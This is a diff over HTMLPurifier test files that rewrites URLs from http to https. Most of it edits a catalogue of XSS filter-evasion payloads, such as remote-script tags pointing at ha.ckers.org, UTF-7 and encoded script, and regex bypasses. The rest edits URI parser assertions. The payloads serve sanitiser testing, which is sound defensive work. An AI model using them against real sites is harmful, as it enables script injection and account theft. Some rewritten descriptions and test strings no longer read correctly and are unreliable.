@@ -682,7 +682,7 @@ echo(&apos;IPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&apos;); ?&gt;</code>
<attack>
<name>DIV w/Unicode</name>
<code>&lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028&apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&apos;\0029&quot;&gt;</code>
<desc>DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail.</desc>
<desc>DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (https://www.sysdream.com) as a vulnerability in Hotmail.</desc>
<label>Character Encoding Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -701,7 +701,7 @@ echo(&apos;IPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&apos;); ?&gt;</code>
<name>UTF-7 Encoding</name>
<code>&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4-</code>
<desc>UTF-7 encoding - if the page that the XSS resides on doesn&apos;t provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one). You don&apos;t need the charset statement if the user&apos;s browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 IE rendering engine mode). Watchfire http://seclists.org/lists/fulldisclosure/2005/Dec/1107.html found this hole in Google&apos;s custom 404 script.</desc>
<desc>UTF-7 encoding - if the page that the XSS resides on doesn&apos;t provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov https://www.pixel-apes.com/ for this one). You don&apos;t need the charset statement if the user&apos;s browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 IE rendering engine mode). Watchfire https://seclists.org/lists/fulldisclosure/2005/Dec/1107.html found this hole in Google&apos;s custom 404 script.</desc>
<label>Character Encoding Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -782,7 +782,7 @@ echo(&apos;IPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&apos;); ?&gt;</code>
<name>Null Chars 1</name>
<code>perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out</code>
<desc>Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy (http://www.portswigger.net/proxy/) or use %00 in the URL string or if you want to write your own injection tool you can use Vim (^V^@ will produce a null) to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example.</desc>
<desc>Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy (https://www.portswigger.net/proxy/) or use %00 in the URL string or if you want to write your own injection tool you can use Vim (^V^@ will produce a null) to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example.</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -807,7 +807,7 @@ echo(&apos;IPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&apos;); ?&gt;</code>
</attack>
<attack>
<name>Non-Alpha/Non-Digit</name>
<code>&lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT/XSS SRC=&quot;https://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example &quot;&lt;SCRIPT\s&quot; != &quot;&lt;SCRIPT/XSS\s&quot;</desc>
<label>Embedded Character Attacks</label>
@@ -825,7 +825,7 @@ echo(&apos;IPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&apos;); ?&gt;</code>
</attack>
<attack>
<name>No Closing Script Tag</name>
<code>&lt;SCRIPT SRC=http://ha.ckers.org/xss.js</code>
<code>&lt;SCRIPT SRC=https://ha.ckers.org/xss.js</code>
<desc>In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don&apos;t actually need the &quot;&gt;&lt;/SCRIPT&gt;&quot; portion of this Cross Site Scripting vector. Firefox assumes it&apos;s safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn&apos;t affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they&apos;re not needed generally.</desc>
<label>Embedded Character Attacks</label>
@@ -844,7 +844,7 @@ echo(&apos;IPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&apos;); ?&gt;</code>
<attack>
<name>Half-Open HTML/JavaScript</name>
<code>&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;</code>
<desc>Unlike Firefox, the IE rendering engine doesn&apos;t add extra data to your page, but it does allow the &quot;javascript:&quot; directive in images. This is useful as a vector because it doesn&apos;t require a close angle bracket. This assumes that there is at least one HTML tag below where you are injecting this cross site scripting vector. Even though there is no close &gt; tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. See http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-mookhey/bh-us-04-mookhey-up.ppt for more info. It gets around the following NIDS regex:
<desc>Unlike Firefox, the IE rendering engine doesn&apos;t add extra data to your page, but it does allow the &quot;javascript:&quot; directive in images. This is useful as a vector because it doesn&apos;t require a close angle bracket. This assumes that there is at least one HTML tag below where you are injecting this cross site scripting vector. Even though there is no close &gt; tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. See https://www.blackhat.com/presentations/bh-usa-04/bh-us-04-mookhey/bh-us-04-mookhey-up.ppt for more info. It gets around the following NIDS regex:
/((\%3D)|(=))[^\n]*((\%3C)|&lt;)[^\n]+((\%3E)|>)/
As a side note, this was also effective against a real world XSS filter I came across using an open ended &lt;IFRAME tag instead of an &lt;IMG tag.</desc>
@@ -854,7 +854,7 @@ As a side note, this was also effective against a real world XSS filter I came a
</attack>
<attack>
<name>Double open angle brackets</name>
<code>&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;</code>
<code>&lt;IFRAME SRC=https://ha.ckers.org/scriptlet.html &lt;</code>
<desc>This is an odd one that Steven Christey brought to my attention. At first I misclassified this as the same XSS vector as above but it&apos;s surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won&apos;t</desc>
<label>Embedded Character Attacks</label>
@@ -864,7 +864,7 @@ As a side note, this was also effective against a real world XSS filter I came a
<attack>
<name>Extraneous Open Brackets</name>
<code>&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;</code>
<desc>(Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error.</desc>
<desc>(Submitted by Franz Sedlmaier https://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (https://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error.</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -873,7 +873,7 @@ As a side note, this was also effective against a real world XSS filter I came a
<attack>
<name>Malformed IMG Tags</name>
<code>&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;</code>
<desc>Originally found by Begeek (http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag.</desc>
<desc>Originally found by Begeek (https://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag.</desc>
<label>Embedded Character Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -892,7 +892,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
<attack>
<name>Event Handlers List 1</name>
<code>See Below</code>
<desc>Event Handlers that can be used in XSS attacks (this is the most comprehensive list on the net, at the time of this writing). Each one may have different results in different browsers. Thanks to Rene Ledosquet (http://www.secaron.de/) for the HTML+TIME updates:
<desc>Event Handlers that can be used in XSS attacks (this is the most comprehensive list on the net, at the time of this writing). Each one may have different results in different browsers. Thanks to Rene Ledosquet (https://www.secaron.de/) for the HTML+TIME updates:
-FSCommand() (execute from within an embedded Flash object)
@@ -1103,7 +1103,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
</attack>
<attack>
<name>Evade Regex Filter 1</name>
<code>&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;https://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>For performing XSS on sites that allow &quot;&lt;SCRIPT>&quot; but don&apos;t allow &quot;&lt;SCRIPT SRC...&quot; by way of the following regex filter:
/&lt;script[^&gt;]+src/i</desc>
@@ -1113,7 +1113,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
</attack>
<attack>
<name>Evade Regex Filter 2</name>
<code>&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT =&quot;blah&quot; SRC=&quot;https://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>For performing XSS on sites that allow &quot;&lt;SCRIPT>&quot; but don&apos;t allow &quot;&lt;SCRIPT SRC...&quot; by way of a regex filter:
/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i
@@ -1125,7 +1125,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
</attack>
<attack>
<name>Evade Regex Filter 3</name>
<code>&lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;https://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>Another XSS to evade this regex filter:
/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i</desc>
@@ -1135,7 +1135,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
</attack>
<attack>
<name>Evade Regex Filter 4</name>
<code>&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;https://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>Yet another XSS to evade the same filter:
/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i
The only thing I&apos;ve seen work against this XSS attack if you still want to allow &lt;SCRIPT&gt; tags but not remote scripts is a state machine (and of course there are other ways to get around this if they allow &lt;SCRIPT&gt; tags)</desc>
@@ -1146,7 +1146,7 @@ The only thing I&apos;ve seen work against this XSS attack if you still want to
</attack>
<attack>
<name>Evade Regex Filter 5</name>
<code>&lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT a=`&gt;` SRC=&quot;https://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>And one last XSS attack (using grave accents) to evade this regex:
/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i</desc>
@@ -1156,7 +1156,7 @@ The only thing I&apos;ve seen work against this XSS attack if you still want to
</attack>
<attack>
<name>Filter Evasion 1</name>
<code>&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;https://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content.</desc>
<label>XSS w/HTML Quote Encapsulation</label>
@@ -1165,7 +1165,7 @@ The only thing I&apos;ve seen work against this XSS attack if you still want to
</attack>
<attack>
<name>Filter Evasion 2</name>
<code>&lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;https://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>Here&apos;s an XSS example that bets on the fact that the regex won&apos;t catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly.</desc>
<label>XSS w/HTML Quote Encapsulation</label>
@@ -1174,8 +1174,8 @@ The only thing I&apos;ve seen work against this XSS attack if you still want to
</attack>
<attack>
<name>IP Encoding</name>
<code>&lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).</desc>
<code>&lt;A HREF=&quot;https://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed).</desc>
<label>URL Obfuscation</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -1183,8 +1183,8 @@ The only thing I&apos;ve seen work against this XSS attack if you still want to
</attack>
<attack>
<name>URL Encoding</name>
<code>&lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).</desc>
<code>&lt;A HREF=&quot;https://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed).</desc>
<label>URL Obfuscation</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -1192,8 +1192,8 @@ The only thing I&apos;ve seen work against this XSS attack if you still want to
</attack>
<attack>
<name>Dword Encoding</name>
<code>&lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).</desc>
<code>&lt;A HREF=&quot;https://1113982867/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed).</desc>
<label>URL Obfuscation</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -1201,8 +1201,8 @@ The only thing I&apos;ve seen work against this XSS attack if you still want to
</attack>
<attack>
<name>Hex Encoding</name>
<code>&lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).
<code>&lt;A HREF=&quot;https://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed).
The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex digit is not required.</desc>
<label>URL Obfuscation</label>
@@ -1211,8 +1211,8 @@ The total size of each number allowed is somewhere in the neighborhood of 240 to
</attack>
<attack>
<name>Octal Encoding</name>
<code>&lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).
<code>&lt;A HREF=&quot;https://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed).
Padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...</desc>
<label>URL Obfuscation</label>
@@ -1222,7 +1222,7 @@ Padding is allowed, although you must keep it above 4 total characters per class
<attack>
<name>Mixed Encoding</name>
<code>&lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed).
The tabs and newlines only work if this is encapsulated with quotes.</desc>
<label>URL Obfuscation</label>
@@ -1232,8 +1232,8 @@ The tabs and newlines only work if this is encapsulated with quotes.</desc>
<attack>
<name>Protocol Resolution Bypass</name>
<code>&lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).
Protocol resolution bypass (// translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like &quot;(ht|f)tp(s)?://&quot; (thanks to Ozh (http://planetOzh.com/) for part of this one). You can also change the &quot;//&quot; to &quot;\\&quot;. You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.</desc>
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed).
Protocol resolution bypass (// translates to https:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like &quot;(ht|f)tp(s)?://&quot; (thanks to Ozh (https://planetOzh.com/) for part of this one). You can also change the &quot;//&quot; to &quot;\\&quot;. You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.</desc>
<label>URL Obfuscation</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -1250,7 +1250,7 @@ Protocol resolution bypass (// translates to http:// which saves a few more byte
</attack>
<attack>
<name>Firefox Lookups 2</name>
<code>&lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt;</code>
<code>&lt;A HREF=&quot;https://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt;</code>
<desc>This uses a very tiny trick that appears to work Firefox only, because if it&apos;s implementation of the &quot;feeling lucky&quot; function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It&apos;s simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera.</desc>
<label>URL Obfuscation</label>
@@ -1259,7 +1259,7 @@ Protocol resolution bypass (// translates to http:// which saves a few more byte
</attack>
<attack>
<name>Firefox Lookups 3</name>
<code>&lt;A HREF=&quot;http://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt;</code>
<code>&lt;A HREF=&quot;https://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt;</code>
<desc>This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the &quot;feeling lucky&quot; function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case &quot;google&quot;).</desc>
<label>URL Obfuscation</label>
@@ -1268,8 +1268,8 @@ Protocol resolution bypass (// translates to http:// which saves a few more byte
</attack>
<attack>
<name>Removing Cnames</name>
<code>&lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).
<code>&lt;A HREF=&quot;https://google.com/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed).
When combined with the above URL, removing &quot;www.&quot; will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly.</desc>
<label>URL Obfuscation</label>
@@ -1278,8 +1278,8 @@ When combined with the above URL, removing &quot;www.&quot; will save an additio
</attack>
<attack>
<name>Extra dot for Absolute DNS</name>
<code>&lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).</desc>
<code>&lt;A HREF=&quot;https://www.google.com./&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed).</desc>
<label>URL Obfuscation</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
@@ -1287,8 +1287,8 @@ When combined with the above URL, removing &quot;www.&quot; will save an additio
</attack>
<attack>
<name>JavaScript Link Location</name>
<code>&lt;A HREF=&quot;javascript:document.location=&apos;http://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed)
<code>&lt;A HREF=&quot;javascript:document.location=&apos;https://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt;</code>
<desc>URL string evasion (assuming &quot;https://www.google.com/&quot; is programmatically disallowed)
JavaScript link location</desc>
<label>URL Obfuscation</label>
@@ -1297,8 +1297,8 @@ JavaScript link location</desc>
</attack>
<attack>
<name>Content Replace</name>
<code>&lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>Content replace as an attack vector (assuming &quot;http://www.google.com/&quot; is programmatically replaced with null). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (like http://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php) to help create the attack vector (&quot;java&amp;#x26;#x09;script:&quot; was converted into &quot;java&amp;#x09;script:&quot;.</desc>
<code>&lt;A HREF=&quot;https://www.gohttps://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt;</code>
<desc>Content replace as an attack vector (assuming &quot;https://www.google.com/&quot; is programmatically replaced with null). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (like https://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php) to help create the attack vector (&quot;java&amp;#x26;#x09;script:&quot; was converted into &quot;java&amp;#x09;script:&quot;.</desc>
<label>URL Obfuscation</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>


@@ -10,18 +10,18 @@ class HTMLPurifier_AttrDef_CSS_URITest extends HTMLPurifier_AttrDefHarness
$this->assertDef('', false);
// we could be nice but we won't be
$this->assertDef('http://www.example.com/', false);
$this->assertDef('https://www.example.com/', false);
$this->assertDef('url(', false);
$this->assertDef('url("")', true);
$result = 'url("http://www.example.com/")';
$this->assertDef('url(http://www.example.com/)', $result);
$this->assertDef('url("http://www.example.com/")', $result);
$this->assertDef("url('http://www.example.com/')", $result);
$result = 'url("https://www.example.com/")';
$this->assertDef('url(https://www.example.com/)', $result);
$this->assertDef('url("https://www.example.com/")', $result);
$this->assertDef("url('https://www.example.com/')", $result);
$this->assertDef(
' url( "http://www.example.com/" ) ', $result);
$this->assertDef("url(http://www.example.com/foo,bar\)\'\()",
'url("http://www.example.com/foo,bar%29%27%28")');
' url( "https://www.example.com/" ) ', $result);
$this->assertDef("url(https://www.example.com/foo,bar\)\'\()",
'url("https://www.example.com/foo,bar%29%27%28")');
}
}


@@ -20,7 +20,7 @@ class HTMLPurifier_AttrDef_URI_HostTest extends HTMLPurifier_AttrDefHarness
$this->assertDef('.test', false);
$this->assertDef('ff');
$this->assertDef('1f'); // per RFC 1123
// See also http://serverfault.com/questions/638260/is-it-valid-for-a-hostname-to-start-with-a-digit
// See also https://serverfault.com/questions/638260/is-it-valid-for-a-hostname-to-start-with-a-digit
$this->assertDef('-f', false);
$this->assertDef('f1');
$this->assertDef('f-', false);


@@ -14,9 +14,9 @@ class HTMLPurifier_AttrDef_URITest extends HTMLPurifier_AttrDefHarness
public function testIntegration()
{
$this->assertDef('http://www.google.com/');
$this->assertDef('http:', '');
$this->assertDef('http:/foo', '/foo');
$this->assertDef('https://www.google.com/');
$this->assertDef('https:', '');
$this->assertDef('https:/foo', '/foo');
